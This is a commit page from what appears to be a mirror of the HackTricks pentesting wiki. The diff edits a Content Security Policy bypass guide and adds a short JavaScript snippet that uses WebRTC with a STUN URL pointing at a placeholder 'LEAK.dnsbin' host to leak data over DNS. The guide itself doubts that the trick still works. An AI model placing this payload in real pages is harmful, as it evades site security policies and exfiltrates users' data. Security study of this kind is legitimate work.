0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

Add WebRTC leak

This commit is contained in:
Alessandro Mizzaro 2023-08-27 21:27:30 +02:00 committed by GitHub
parent 184b0cda9d
commit 391ca4ad7e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
pentesting-web/content-security-policy-csp-bypass/README.md
View File

@ -626,15 +626,11 @@ Apparently, this technique doesn't work in headless browsers (bots)
On several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP.
Actually you can *leak* informations using a *DNS request*. Check out this code:
```javascript
var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));
(async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
```
However, it doesn't look like it's [not possible anymore](https://github.com/w3c/webrtc-nv-use-cases/issues/35) (or at least not that easy).
If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)
## Checking CSP Policies Online
* [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)